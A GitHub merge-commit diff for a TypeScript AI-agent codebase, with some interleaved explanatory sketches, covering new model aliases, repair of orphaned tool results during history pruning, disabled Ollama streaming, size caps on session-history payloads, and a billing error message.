Merge branch 'main' into qianfan

ide-rea
2026-02-06 17:58:28 +08:00
committed by GitHub
413 changed files with 26165 additions and 6070 deletions

View File

@@ -287,16 +287,18 @@ describe("exec notifyOnExit", () => {
expect(result.details.status).toBe("running");
const sessionId = (result.details as { sessionId: string }).sessionId;
const prefix = sessionId.slice(0, 8);
let finished = getFinishedSession(sessionId);
const deadline = Date.now() + (isWin ? 8000 : 2000);
while (!finished && Date.now() < deadline) {
let hasEvent = peekSystemEvents("agent:main:main").some((event) => event.includes(prefix));
const deadline = Date.now() + (isWin ? 12_000 : 5_000);
while ((!finished || !hasEvent) && Date.now() < deadline) {
await sleep(20);
finished = getFinishedSession(sessionId);
hasEvent = peekSystemEvents("agent:main:main").some((event) => event.includes(prefix));
}
expect(finished).toBeTruthy();
const events = peekSystemEvents("agent:main:main");
expect(events.some((event) => event.includes(sessionId.slice(0, 8)))).toBe(true);
expect(hasEvent).toBe(true);
});
});
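The updated loop above hand-rolls a poll-until-deadline pattern (now covering both the finished-session state and the new hasEvent check, with a longer Windows deadline). A small reusable helper expressing the same idea, shown only as an illustrative sketch and not part of this change, could look like:

async function pollUntil(
  predicate: () => boolean,
  opts: { timeoutMs: number; intervalMs?: number },
): Promise<boolean> {
  // Poll the predicate until it returns true or the deadline passes.
  const deadline = Date.now() + opts.timeoutMs;
  const interval = opts.intervalMs ?? 20;
  while (Date.now() < deadline) {
    if (predicate()) return true;
    await new Promise((resolve) => setTimeout(resolve, interval));
  }
  return predicate();
}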

View File

@@ -9,8 +9,10 @@ export type ResolvedCliBackend = {
const CLAUDE_MODEL_ALIASES: Record<string, string> = {
opus: "opus",
"opus-4.6": "opus",
"opus-4.5": "opus",
"opus-4": "opus",
"claude-opus-4-6": "opus",
"claude-opus-4-5": "opus",
"claude-opus-4": "opus",
sonnet: "sonnet",

View File

@@ -106,6 +106,10 @@ describe("pruneHistoryForContextShare", () => {
});
it("returns droppedMessagesList containing dropped messages", () => {
// Note: This test uses simple user messages with no tool calls.
// When orphaned tool_results exist, droppedMessages may exceed
// droppedMessagesList.length since orphans are counted but not
// added to the list (they lack context for summarization).
const messages: AgentMessage[] = [
makeMessage(1, 4000),
makeMessage(2, 4000),
@@ -121,6 +125,7 @@ describe("pruneHistoryForContextShare", () => {
});
expect(pruned.droppedChunks).toBeGreaterThan(0);
// Without orphaned tool_results, counts match exactly
expect(pruned.droppedMessagesList.length).toBe(pruned.droppedMessages);
// All messages accounted for: kept + dropped = original
@@ -145,4 +150,144 @@ describe("pruneHistoryForContextShare", () => {
expect(pruned.droppedMessagesList).toEqual([]);
expect(pruned.messages.length).toBe(1);
});
it("removes orphaned tool_result messages when tool_use is dropped", () => {
// Scenario: assistant with tool_use is in chunk 1 (dropped),
// tool_result is in chunk 2 (kept) - orphaned tool_result should be removed
// to prevent "unexpected tool_use_id" errors from Anthropic's API
const messages: AgentMessage[] = [
// Chunk 1 (will be dropped) - contains tool_use
{
role: "assistant",
content: [
{ type: "text", text: "x".repeat(4000) },
{ type: "toolUse", id: "call_123", name: "test_tool", input: {} },
],
timestamp: 1,
},
// Chunk 2 (will be kept) - contains orphaned tool_result
{
role: "toolResult",
toolCallId: "call_123",
toolName: "test_tool",
content: [{ type: "text", text: "result".repeat(500) }],
timestamp: 2,
} as AgentMessage,
{
role: "user",
content: "x".repeat(500),
timestamp: 3,
},
];
const pruned = pruneHistoryForContextShare({
messages,
maxContextTokens: 2000,
maxHistoryShare: 0.5,
parts: 2,
});
// The orphaned tool_result should NOT be in kept messages
// (this is the critical invariant that prevents API errors)
const keptRoles = pruned.messages.map((m) => m.role);
expect(keptRoles).not.toContain("toolResult");
// The orphan count should be reflected in droppedMessages
// (orphaned tool_results are dropped but not added to droppedMessagesList
// since they lack context for summarization)
expect(pruned.droppedMessages).toBeGreaterThan(pruned.droppedMessagesList.length);
});
it("keeps tool_result when its tool_use is also kept", () => {
// Scenario: both tool_use and tool_result are in the kept portion
const messages: AgentMessage[] = [
// Chunk 1 (will be dropped) - just user content
{
role: "user",
content: "x".repeat(4000),
timestamp: 1,
},
// Chunk 2 (will be kept) - contains both tool_use and tool_result
{
role: "assistant",
content: [
{ type: "text", text: "y".repeat(500) },
{ type: "toolUse", id: "call_456", name: "kept_tool", input: {} },
],
timestamp: 2,
},
{
role: "toolResult",
toolCallId: "call_456",
toolName: "kept_tool",
content: [{ type: "text", text: "result" }],
timestamp: 3,
} as AgentMessage,
];
const pruned = pruneHistoryForContextShare({
messages,
maxContextTokens: 2000,
maxHistoryShare: 0.5,
parts: 2,
});
// Both assistant and toolResult should be in kept messages
const keptRoles = pruned.messages.map((m) => m.role);
expect(keptRoles).toContain("assistant");
expect(keptRoles).toContain("toolResult");
});
it("removes multiple orphaned tool_results from the same dropped tool_use", () => {
// Scenario: assistant with multiple tool_use blocks is dropped,
// all corresponding tool_results should be removed from kept messages
const messages: AgentMessage[] = [
// Chunk 1 (will be dropped) - contains multiple tool_use blocks
{
role: "assistant",
content: [
{ type: "text", text: "x".repeat(4000) },
{ type: "toolUse", id: "call_a", name: "tool_a", input: {} },
{ type: "toolUse", id: "call_b", name: "tool_b", input: {} },
],
timestamp: 1,
},
// Chunk 2 (will be kept) - contains orphaned tool_results
{
role: "toolResult",
toolCallId: "call_a",
toolName: "tool_a",
content: [{ type: "text", text: "result_a" }],
timestamp: 2,
} as AgentMessage,
{
role: "toolResult",
toolCallId: "call_b",
toolName: "tool_b",
content: [{ type: "text", text: "result_b" }],
timestamp: 3,
} as AgentMessage,
{
role: "user",
content: "x".repeat(500),
timestamp: 4,
},
];
const pruned = pruneHistoryForContextShare({
messages,
maxContextTokens: 2000,
maxHistoryShare: 0.5,
parts: 2,
});
// No orphaned tool_results should be in kept messages
const keptToolResults = pruned.messages.filter((m) => m.role === "toolResult");
expect(keptToolResults).toHaveLength(0);
// The orphan count should reflect both dropped tool_results
// droppedMessages = 1 (assistant) + 2 (orphaned tool_results) = 3
// droppedMessagesList only has the assistant message
expect(pruned.droppedMessages).toBe(pruned.droppedMessagesList.length + 2);
});
});

View File

@@ -2,6 +2,7 @@ import type { AgentMessage } from "@mariozechner/pi-agent-core";
import type { ExtensionContext } from "@mariozechner/pi-coding-agent";
import { estimateTokens, generateSummary } from "@mariozechner/pi-coding-agent";
import { DEFAULT_CONTEXT_TOKENS } from "./defaults.js";
import { repairToolUseResultPairing } from "./session-transcript-repair.js";
export const BASE_CHUNK_RATIO = 0.4;
export const MIN_CHUNK_RATIO = 0.15;
@@ -333,11 +334,27 @@ export function pruneHistoryForContextShare(params: {
break;
}
const [dropped, ...rest] = chunks;
const flatRest = rest.flat();
// After dropping a chunk, repair tool_use/tool_result pairing to handle
// orphaned tool_results (whose tool_use was in the dropped chunk).
// repairToolUseResultPairing drops orphaned tool_results, preventing
// "unexpected tool_use_id" errors from Anthropic's API.
const repairReport = repairToolUseResultPairing(flatRest);
const repairedKept = repairReport.messages;
// Track orphaned tool_results as dropped (they were in the kept messages but their tool_use was dropped)
const orphanedCount = repairReport.droppedOrphanCount;
droppedChunks += 1;
droppedMessages += dropped.length;
droppedMessages += dropped.length + orphanedCount;
droppedTokens += estimateMessagesTokens(dropped);
// Note: We don't have the actual orphaned messages to add to droppedMessagesList
// since repairToolUseResultPairing doesn't return them. This is acceptable since
// the dropped messages are used for summarization, and orphaned tool_results
// without their tool_use context aren't useful for summarization anyway.
allDroppedMessages.push(...dropped);
keptMessages = rest.flat();
keptMessages = repairedKept;
}
return {
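The comments in this hunk describe the repair step only at a high level: after a chunk is dropped, any toolResult whose tool_use lived in that dropped chunk must itself be removed, and it is counted in droppedMessages but never added to droppedMessagesList. A minimal sketch of that orphan-removal idea, using simplified message shapes that are assumptions rather than the real AgentMessage type:

type SketchMessage =
  | { role: "assistant"; content: Array<{ type: string; id?: string; text?: string }> }
  | { role: "toolResult"; toolCallId: string }
  | { role: "user"; content: string };

function dropOrphanToolResults(kept: SketchMessage[]): {
  messages: SketchMessage[];
  droppedOrphanCount: number;
} {
  // Collect the tool_use ids still present in the kept messages, then drop any
  // toolResult that points at an id we never saw (its tool_use was pruned away).
  const seenToolUseIds = new Set<string>();
  const messages: SketchMessage[] = [];
  let droppedOrphanCount = 0;
  for (const msg of kept) {
    if (msg.role === "assistant") {
      for (const block of msg.content) {
        if (block.type === "toolUse" && block.id) {
          seenToolUseIds.add(block.id);
        }
      }
      messages.push(msg);
      continue;
    }
    if (msg.role === "toolResult" && !seenToolUseIds.has(msg.toolCallId)) {
      droppedOrphanCount += 1; // counted as dropped, but not useful for summarization
      continue;
    }
    messages.push(msg);
  }
  return { messages, droppedOrphanCount };
}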

View File

@@ -1,6 +1,6 @@
// Defaults for agent metadata when upstream does not supply them.
// Model id uses pi-ai's built-in Anthropic catalog.
export const DEFAULT_PROVIDER = "anthropic";
export const DEFAULT_MODEL = "claude-opus-4-5";
// Context window: Opus 4.5 supports ~200k tokens (per pi-ai models.generated.ts).
export const DEFAULT_MODEL = "claude-opus-4-6";
// Conservative fallback used when model metadata is unavailable.
export const DEFAULT_CONTEXT_TOKENS = 200_000;

View File

@@ -3,11 +3,17 @@ export type ModelRef = {
id?: string | null;
};
const ANTHROPIC_PREFIXES = ["claude-opus-4-5", "claude-sonnet-4-5", "claude-haiku-4-5"];
const ANTHROPIC_PREFIXES = [
"claude-opus-4-6",
"claude-opus-4-5",
"claude-sonnet-4-5",
"claude-haiku-4-5",
];
const OPENAI_MODELS = ["gpt-5.2", "gpt-5.0"];
const CODEX_MODELS = [
"gpt-5.2",
"gpt-5.2-codex",
"gpt-5.3-codex",
"gpt-5.1-codex",
"gpt-5.1-codex-mini",
"gpt-5.1-codex-max",

View File

@@ -140,7 +140,7 @@ describe("getApiKeyForModel", () => {
} catch (err) {
error = err;
}
expect(String(error)).toContain("openai-codex/gpt-5.2");
expect(String(error)).toContain("openai-codex/gpt-5.3-codex");
} finally {
if (previousOpenAiKey === undefined) {
delete process.env.OPENAI_API_KEY;

View File

@@ -213,7 +213,7 @@ export async function resolveApiKeyForProvider(params: {
const hasCodex = listProfilesForProvider(store, "openai-codex").length > 0;
if (hasCodex) {
throw new Error(
'No API key found for provider "openai". You are authenticated with OpenAI Codex OAuth. Use openai-codex/gpt-5.2 (ChatGPT OAuth) or set OPENAI_API_KEY for openai/gpt-5.2.',
'No API key found for provider "openai". You are authenticated with OpenAI Codex OAuth. Use openai-codex/gpt-5.3-codex (OAuth) or set OPENAI_API_KEY to use openai/gpt-5.1-codex.',
);
}
}
@@ -302,6 +302,7 @@ export function resolveEnvApiKey(provider: string): EnvApiKeyResult | null {
mistral: "MISTRAL_API_KEY",
opencode: "OPENCODE_API_KEY",
qianfan: "QIANFAN_API_KEY",
ollama: "OLLAMA_API_KEY",
};
const envVar = envMap[normalized];
if (!envVar) {

View File

@@ -13,9 +13,9 @@ import {
isTimeoutError,
} from "./failover-error.js";
import {
buildConfiguredAllowlistKeys,
buildModelAliasIndex,
modelKey,
parseModelRef,
resolveConfiguredModelRef,
resolveModelRefFromString,
} from "./model-selection.js";
@@ -51,28 +51,6 @@ function shouldRethrowAbort(err: unknown): boolean {
return isAbortError(err) && !isTimeoutError(err);
}
function buildAllowedModelKeys(
cfg: OpenClawConfig | undefined,
defaultProvider: string,
): Set<string> | null {
const rawAllowlist = (() => {
const modelMap = cfg?.agents?.defaults?.models ?? {};
return Object.keys(modelMap);
})();
if (rawAllowlist.length === 0) {
return null;
}
const keys = new Set<string>();
for (const raw of rawAllowlist) {
const parsed = parseModelRef(String(raw ?? ""), defaultProvider);
if (!parsed) {
continue;
}
keys.add(modelKey(parsed.provider, parsed.model));
}
return keys.size > 0 ? keys : null;
}
function resolveImageFallbackCandidates(params: {
cfg: OpenClawConfig | undefined;
defaultProvider: string;
@@ -82,7 +60,10 @@ function resolveImageFallbackCandidates(params: {
cfg: params.cfg ?? {},
defaultProvider: params.defaultProvider,
});
const allowlist = buildAllowedModelKeys(params.cfg, params.defaultProvider);
const allowlist = buildConfiguredAllowlistKeys({
cfg: params.cfg,
defaultProvider: params.defaultProvider,
});
const seen = new Set<string>();
const candidates: ModelCandidate[] = [];
@@ -166,7 +147,10 @@ function resolveFallbackCandidates(params: {
cfg: params.cfg ?? {},
defaultProvider,
});
const allowlist = buildAllowedModelKeys(params.cfg, defaultProvider);
const allowlist = buildConfiguredAllowlistKeys({
cfg: params.cfg,
defaultProvider,
});
const seen = new Set<string>();
const candidates: ModelCandidate[] = [];

View File

@@ -29,6 +29,17 @@ describe("model-selection", () => {
});
});
it("normalizes anthropic alias refs to canonical model ids", () => {
expect(parseModelRef("anthropic/opus-4.6", "openai")).toEqual({
provider: "anthropic",
model: "claude-opus-4-6",
});
expect(parseModelRef("opus-4.6", "anthropic")).toEqual({
provider: "anthropic",
model: "claude-opus-4-6",
});
});
it("should use default provider if none specified", () => {
expect(parseModelRef("claude-3-5-sonnet", "anthropic")).toEqual({
provider: "anthropic",

View File

@@ -16,6 +16,12 @@ export type ModelAliasIndex = {
byKey: Map<string, string[]>;
};
const ANTHROPIC_MODEL_ALIASES: Record<string, string> = {
"opus-4.6": "claude-opus-4-6",
"opus-4.5": "claude-opus-4-5",
"sonnet-4.5": "claude-sonnet-4-5",
};
function normalizeAliasKey(value: string): string {
return value.trim().toLowerCase();
}
@@ -59,13 +65,7 @@ function normalizeAnthropicModelId(model: string): string {
return trimmed;
}
const lower = trimmed.toLowerCase();
if (lower === "opus-4.5") {
return "claude-opus-4-5";
}
if (lower === "sonnet-4.5") {
return "claude-sonnet-4-5";
}
return trimmed;
return ANTHROPIC_MODEL_ALIASES[lower] ?? trimmed;
}
function normalizeProviderModelId(provider: string, model: string): string {
@@ -99,6 +99,33 @@ export function parseModelRef(raw: string, defaultProvider: string): ModelRef |
return { provider, model: normalizedModel };
}
export function resolveAllowlistModelKey(raw: string, defaultProvider: string): string | null {
const parsed = parseModelRef(raw, defaultProvider);
if (!parsed) {
return null;
}
return modelKey(parsed.provider, parsed.model);
}
export function buildConfiguredAllowlistKeys(params: {
cfg: OpenClawConfig | undefined;
defaultProvider: string;
}): Set<string> | null {
const rawAllowlist = Object.keys(params.cfg?.agents?.defaults?.models ?? {});
if (rawAllowlist.length === 0) {
return null;
}
const keys = new Set<string>();
for (const raw of rawAllowlist) {
const key = resolveAllowlistModelKey(String(raw ?? ""), params.defaultProvider);
if (key) {
keys.add(key);
}
}
return keys.size > 0 ? keys : null;
}
export function buildModelAliasIndex(params: {
cfg: OpenClawConfig;
defaultProvider: string;

View File

@@ -12,4 +12,45 @@ describe("Ollama provider", () => {
// Ollama requires explicit configuration via OLLAMA_API_KEY env var or profile
expect(providers?.ollama).toBeUndefined();
});
it("should disable streaming by default for Ollama models", async () => {
const agentDir = mkdtempSync(join(tmpdir(), "openclaw-test-"));
process.env.OLLAMA_API_KEY = "test-key";
try {
const providers = await resolveImplicitProviders({ agentDir });
// Provider should be defined with OLLAMA_API_KEY set
expect(providers?.ollama).toBeDefined();
expect(providers?.ollama?.apiKey).toBe("OLLAMA_API_KEY");
// Note: discoverOllamaModels() returns an empty array in test environments (VITEST env var check)
// so we can't test the actual model discovery here. The streaming: false setting
// is applied in the model mapping within discoverOllamaModels().
// The configuration structure itself is validated by TypeScript and the Zod schema.
} finally {
delete process.env.OLLAMA_API_KEY;
}
});
it("should have correct model structure with streaming disabled (unit test)", () => {
// This test directly verifies the model configuration structure
// since discoverOllamaModels() returns an empty array in test mode
const mockOllamaModel = {
id: "llama3.3:latest",
name: "llama3.3:latest",
reasoning: false,
input: ["text"],
cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
contextWindow: 128000,
maxTokens: 8192,
params: {
streaming: false,
},
};
// Verify the model structure matches what discoverOllamaModels() would return
expect(mockOllamaModel.params?.streaming).toBe(false);
expect(mockOllamaModel.params).toHaveProperty("streaming");
});
});

View File

@@ -136,6 +136,11 @@ async function discoverOllamaModels(): Promise<ModelDefinitionConfig[]> {
cost: OLLAMA_DEFAULT_COST,
contextWindow: OLLAMA_DEFAULT_CONTEXT_WINDOW,
maxTokens: OLLAMA_DEFAULT_MAX_TOKENS,
// Disable streaming by default for Ollama to avoid SDK issue #1205
// See: https://github.com/badlogic/pi-mono/issues/1205
params: {
streaming: false,
},
};
});
} catch (error) {

View File

@@ -181,6 +181,128 @@ describe("sessions tools", () => {
expect(withToolsDetails.messages).toHaveLength(2);
});
it("sessions_history caps oversized payloads and strips heavy fields", async () => {
callGatewayMock.mockReset();
const oversized = Array.from({ length: 80 }, (_, idx) => ({
role: "assistant",
content: [
{
type: "text",
text: `${String(idx)}:${"x".repeat(5000)}`,
},
{
type: "thinking",
thinking: "y".repeat(7000),
thinkingSignature: "sig".repeat(4000),
},
],
details: {
giant: "z".repeat(12000),
},
usage: {
input: 1,
output: 1,
},
}));
callGatewayMock.mockImplementation(async (opts: unknown) => {
const request = opts as { method?: string };
if (request.method === "chat.history") {
return { messages: oversized };
}
return {};
});
const tool = createOpenClawTools().find((candidate) => candidate.name === "sessions_history");
expect(tool).toBeDefined();
if (!tool) {
throw new Error("missing sessions_history tool");
}
const result = await tool.execute("call4b", {
sessionKey: "main",
includeTools: true,
});
const details = result.details as {
messages?: Array<Record<string, unknown>>;
truncated?: boolean;
droppedMessages?: boolean;
contentTruncated?: boolean;
bytes?: number;
};
expect(details.truncated).toBe(true);
expect(details.droppedMessages).toBe(true);
expect(details.contentTruncated).toBe(true);
expect(typeof details.bytes).toBe("number");
expect((details.bytes ?? 0) <= 80 * 1024).toBe(true);
expect(details.messages && details.messages.length > 0).toBe(true);
const first = details.messages?.[0] as
| {
details?: unknown;
usage?: unknown;
content?: Array<{
type?: string;
text?: string;
thinking?: string;
thinkingSignature?: string;
}>;
}
| undefined;
expect(first?.details).toBeUndefined();
expect(first?.usage).toBeUndefined();
const textBlock = first?.content?.find((block) => block.type === "text");
expect(typeof textBlock?.text).toBe("string");
expect((textBlock?.text ?? "").length <= 4015).toBe(true);
const thinkingBlock = first?.content?.find((block) => block.type === "thinking");
expect(thinkingBlock?.thinkingSignature).toBeUndefined();
});
it("sessions_history enforces a hard byte cap even when a single message is huge", async () => {
callGatewayMock.mockReset();
callGatewayMock.mockImplementation(async (opts: unknown) => {
const request = opts as { method?: string };
if (request.method === "chat.history") {
return {
messages: [
{
role: "assistant",
content: [{ type: "text", text: "ok" }],
extra: "x".repeat(200_000),
},
],
};
}
return {};
});
const tool = createOpenClawTools().find((candidate) => candidate.name === "sessions_history");
expect(tool).toBeDefined();
if (!tool) {
throw new Error("missing sessions_history tool");
}
const result = await tool.execute("call4c", {
sessionKey: "main",
includeTools: true,
});
const details = result.details as {
messages?: Array<Record<string, unknown>>;
truncated?: boolean;
droppedMessages?: boolean;
contentTruncated?: boolean;
bytes?: number;
};
expect(details.truncated).toBe(true);
expect(details.droppedMessages).toBe(true);
expect(details.contentTruncated).toBe(false);
expect(typeof details.bytes).toBe("number");
expect((details.bytes ?? 0) <= 80 * 1024).toBe(true);
expect(details.messages).toHaveLength(1);
expect(details.messages?.[0]?.content).toContain(
"[sessions_history omitted: message too large]",
);
});
it("sessions_history resolves sessionId inputs", async () => {
callGatewayMock.mockReset();
const sessionId = "sess-group";
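The two payload-cap tests in this hunk pin down the observable contract for sessions_history: details, usage, and thinkingSignature are stripped, long text blocks are truncated, the serialized payload stays under 80 KiB, and a single oversized message is replaced by an omission placeholder. A sketch of a capping helper consistent with those assertions; the names and thresholds below are inferred from the tests, not taken from the real implementation:

const HISTORY_BYTE_CAP = 80 * 1024; // matches the "<= 80 * 1024" assertions above
const TEXT_CHAR_CAP = 4000; // approximate; the tests only require <= 4015 chars

function stripHeavyFields(msg: Record<string, unknown>): Record<string, unknown> {
  // Drop details/usage and thinking signatures, and truncate very long text blocks.
  const { details: _details, usage: _usage, ...rest } = msg;
  if (Array.isArray(rest.content)) {
    rest.content = rest.content.map((block) => {
      if (!block || typeof block !== "object") {
        return block;
      }
      const { thinkingSignature: _sig, ...kept } = block as Record<string, unknown>;
      if (typeof kept.text === "string" && kept.text.length > TEXT_CHAR_CAP) {
        kept.text = `${kept.text.slice(0, TEXT_CHAR_CAP)}…`;
      }
      return kept;
    });
  }
  return rest;
}

function capHistoryPayload(messages: Array<Record<string, unknown>>) {
  // Strip heavy fields first, then drop trailing messages until the payload fits.
  let kept = messages.map(stripHeavyFields);
  while (kept.length > 1 && Buffer.byteLength(JSON.stringify(kept)) > HISTORY_BYTE_CAP) {
    kept = kept.slice(0, -1);
  }
  return { messages: kept, bytes: Buffer.byteLength(JSON.stringify(kept)) };
}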

View File

@@ -8,12 +8,12 @@ import {
describe("resolveOpencodeZenAlias", () => {
it("resolves opus alias", () => {
expect(resolveOpencodeZenAlias("opus")).toBe("claude-opus-4-5");
expect(resolveOpencodeZenAlias("opus")).toBe("claude-opus-4-6");
});
it("keeps legacy aliases working", () => {
expect(resolveOpencodeZenAlias("sonnet")).toBe("claude-opus-4-5");
expect(resolveOpencodeZenAlias("haiku")).toBe("claude-opus-4-5");
expect(resolveOpencodeZenAlias("sonnet")).toBe("claude-opus-4-6");
expect(resolveOpencodeZenAlias("haiku")).toBe("claude-opus-4-6");
expect(resolveOpencodeZenAlias("gpt4")).toBe("gpt-5.1");
expect(resolveOpencodeZenAlias("o1")).toBe("gpt-5.2");
expect(resolveOpencodeZenAlias("gemini-2.5")).toBe("gemini-3-pro");
@@ -32,14 +32,14 @@ describe("resolveOpencodeZenAlias", () => {
});
it("is case-insensitive", () => {
expect(resolveOpencodeZenAlias("OPUS")).toBe("claude-opus-4-5");
expect(resolveOpencodeZenAlias("OPUS")).toBe("claude-opus-4-6");
expect(resolveOpencodeZenAlias("Gpt5")).toBe("gpt-5.2");
});
});
describe("resolveOpencodeZenModelApi", () => {
it("maps APIs by model family", () => {
expect(resolveOpencodeZenModelApi("claude-opus-4-5")).toBe("anthropic-messages");
expect(resolveOpencodeZenModelApi("claude-opus-4-6")).toBe("anthropic-messages");
expect(resolveOpencodeZenModelApi("gemini-3-pro")).toBe("google-generative-ai");
expect(resolveOpencodeZenModelApi("gpt-5.2")).toBe("openai-responses");
expect(resolveOpencodeZenModelApi("alpha-gd4")).toBe("openai-completions");
@@ -53,13 +53,14 @@ describe("getOpencodeZenStaticFallbackModels", () => {
it("returns an array of models", () => {
const models = getOpencodeZenStaticFallbackModels();
expect(Array.isArray(models)).toBe(true);
expect(models.length).toBe(9);
expect(models.length).toBe(10);
});
it("includes Claude, GPT, Gemini, and GLM models", () => {
const models = getOpencodeZenStaticFallbackModels();
const ids = models.map((m) => m.id);
expect(ids).toContain("claude-opus-4-6");
expect(ids).toContain("claude-opus-4-5");
expect(ids).toContain("gpt-5.2");
expect(ids).toContain("gpt-5.1-codex");
@@ -83,15 +84,16 @@ describe("getOpencodeZenStaticFallbackModels", () => {
describe("OPENCODE_ZEN_MODEL_ALIASES", () => {
it("has expected aliases", () => {
expect(OPENCODE_ZEN_MODEL_ALIASES.opus).toBe("claude-opus-4-5");
expect(OPENCODE_ZEN_MODEL_ALIASES.opus).toBe("claude-opus-4-6");
expect(OPENCODE_ZEN_MODEL_ALIASES.codex).toBe("gpt-5.1-codex");
expect(OPENCODE_ZEN_MODEL_ALIASES.gpt5).toBe("gpt-5.2");
expect(OPENCODE_ZEN_MODEL_ALIASES.gemini).toBe("gemini-3-pro");
expect(OPENCODE_ZEN_MODEL_ALIASES.glm).toBe("glm-4.7");
expect(OPENCODE_ZEN_MODEL_ALIASES["opus-4.5"]).toBe("claude-opus-4-5");
// Legacy aliases (kept for backward compatibility).
expect(OPENCODE_ZEN_MODEL_ALIASES.sonnet).toBe("claude-opus-4-5");
expect(OPENCODE_ZEN_MODEL_ALIASES.haiku).toBe("claude-opus-4-5");
expect(OPENCODE_ZEN_MODEL_ALIASES.sonnet).toBe("claude-opus-4-6");
expect(OPENCODE_ZEN_MODEL_ALIASES.haiku).toBe("claude-opus-4-6");
expect(OPENCODE_ZEN_MODEL_ALIASES.gpt4).toBe("gpt-5.1");
expect(OPENCODE_ZEN_MODEL_ALIASES.o1).toBe("gpt-5.2");
expect(OPENCODE_ZEN_MODEL_ALIASES["gemini-2.5"]).toBe("gemini-3-pro");

View File

@@ -1,8 +1,11 @@
/**
* OpenCode Zen model catalog with dynamic fetching, caching, and static fallback.
*
* OpenCode Zen is a $200/month subscription that provides proxy access to multiple
* AI models (Claude, GPT, Gemini, etc.) through a single API endpoint.
* OpenCode Zen is a pay-as-you-go token-based API that provides access to curated
* models optimized for coding agents. It uses per-request billing with auto top-up.
*
* Note: OpenCode Black ($20/$100/$200/month subscriptions) is a separate product
* with flat-rate usage tiers. This module handles Zen, not Black.
*
* API endpoint: https://opencode.ai/zen/v1
* Auth URL: https://opencode.ai/auth
@@ -11,7 +14,7 @@
import type { ModelApi, ModelDefinitionConfig } from "../config/types.js";
export const OPENCODE_ZEN_API_BASE_URL = "https://opencode.ai/zen/v1";
export const OPENCODE_ZEN_DEFAULT_MODEL = "claude-opus-4-5";
export const OPENCODE_ZEN_DEFAULT_MODEL = "claude-opus-4-6";
export const OPENCODE_ZEN_DEFAULT_MODEL_REF = `opencode/${OPENCODE_ZEN_DEFAULT_MODEL}`;
// Cache for fetched models (1 hour TTL)
@@ -21,19 +24,20 @@ const CACHE_TTL_MS = 60 * 60 * 1000; // 1 hour
/**
* Model aliases for convenient shortcuts.
* Users can use "opus" instead of "claude-opus-4-5", etc.
* Users can use "opus" instead of "claude-opus-4-6", etc.
*/
export const OPENCODE_ZEN_MODEL_ALIASES: Record<string, string> = {
// Claude
opus: "claude-opus-4-5",
opus: "claude-opus-4-6",
"opus-4.6": "claude-opus-4-6",
"opus-4.5": "claude-opus-4-5",
"opus-4": "claude-opus-4-5",
"opus-4": "claude-opus-4-6",
// Legacy Claude aliases (OpenCode Zen rotates model catalogs; keep old keys working).
sonnet: "claude-opus-4-5",
"sonnet-4": "claude-opus-4-5",
haiku: "claude-opus-4-5",
"haiku-3.5": "claude-opus-4-5",
sonnet: "claude-opus-4-6",
"sonnet-4": "claude-opus-4-6",
haiku: "claude-opus-4-6",
"haiku-3.5": "claude-opus-4-6",
// GPT-5.x family
gpt5: "gpt-5.2",
@@ -119,6 +123,7 @@ const MODEL_COSTS: Record<
cacheRead: 0.107,
cacheWrite: 0,
},
"claude-opus-4-6": { input: 5, output: 25, cacheRead: 0.5, cacheWrite: 6.25 },
"claude-opus-4-5": { input: 5, output: 25, cacheRead: 0.5, cacheWrite: 6.25 },
"gemini-3-pro": { input: 2, output: 12, cacheRead: 0.2, cacheWrite: 0 },
"gpt-5.1-codex-mini": {
@@ -143,6 +148,7 @@ const DEFAULT_COST = { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 };
const MODEL_CONTEXT_WINDOWS: Record<string, number> = {
"gpt-5.1-codex": 400000,
"claude-opus-4-6": 1000000,
"claude-opus-4-5": 200000,
"gemini-3-pro": 1048576,
"gpt-5.1-codex-mini": 400000,
@@ -159,6 +165,7 @@ function getDefaultContextWindow(modelId: string): number {
const MODEL_MAX_TOKENS: Record<string, number> = {
"gpt-5.1-codex": 128000,
"claude-opus-4-6": 128000,
"claude-opus-4-5": 64000,
"gemini-3-pro": 65536,
"gpt-5.1-codex-mini": 128000,
@@ -195,6 +202,7 @@ function buildModelDefinition(modelId: string): ModelDefinitionConfig {
*/
const MODEL_NAMES: Record<string, string> = {
"gpt-5.1-codex": "GPT-5.1 Codex",
"claude-opus-4-6": "Claude Opus 4.6",
"claude-opus-4-5": "Claude Opus 4.5",
"gemini-3-pro": "Gemini 3 Pro",
"gpt-5.1-codex-mini": "GPT-5.1 Codex Mini",
@@ -222,6 +230,7 @@ function formatModelName(modelId: string): string {
export function getOpencodeZenStaticFallbackModels(): ModelDefinitionConfig[] {
const modelIds = [
"gpt-5.1-codex",
"claude-opus-4-6",
"claude-opus-4-5",
"gemini-3-pro",
"gpt-5.1-codex-mini",

View File

@@ -1,6 +1,6 @@
import type { AssistantMessage } from "@mariozechner/pi-ai";
import { describe, expect, it } from "vitest";
import { formatAssistantErrorText } from "./pi-embedded-helpers.js";
import { BILLING_ERROR_USER_MESSAGE, formatAssistantErrorText } from "./pi-embedded-helpers.js";
describe("formatAssistantErrorText", () => {
const makeAssistantError = (errorMessage: string): AssistantMessage =>
@@ -53,4 +53,19 @@ describe("formatAssistantErrorText", () => {
);
expect(formatAssistantErrorText(msg)).toBe("LLM error server_error: Something exploded");
});
it("returns a friendly billing message for credit balance errors", () => {
const msg = makeAssistantError("Your credit balance is too low to access the Anthropic API.");
const result = formatAssistantErrorText(msg);
expect(result).toBe(BILLING_ERROR_USER_MESSAGE);
});
it("returns a friendly billing message for HTTP 402 errors", () => {
const msg = makeAssistantError("HTTP 402 Payment Required");
const result = formatAssistantErrorText(msg);
expect(result).toBe(BILLING_ERROR_USER_MESSAGE);
});
it("returns a friendly billing message for insufficient credits", () => {
const msg = makeAssistantError("insufficient credits");
const result = formatAssistantErrorText(msg);
expect(result).toBe(BILLING_ERROR_USER_MESSAGE);
});
});

View File

@@ -6,6 +6,7 @@ export {
stripThoughtSignatures,
} from "./pi-embedded-helpers/bootstrap.js";
export {
BILLING_ERROR_USER_MESSAGE,
classifyFailoverReason,
formatRawAssistantErrorForUi,
formatAssistantErrorText,

View File

@@ -3,6 +3,9 @@ import type { OpenClawConfig } from "../../config/config.js";
import type { FailoverReason } from "./types.js";
import { formatSandboxToolPolicyBlockedMessage } from "../sandbox.js";
export const BILLING_ERROR_USER_MESSAGE =
"⚠️ API provider returned a billing error — your API key has run out of credits or has an insufficient balance. Check your provider's billing dashboard and top up or switch to a different API key.";
export function isContextOverflowError(errorMessage?: string): boolean {
if (!errorMessage) {
return false;
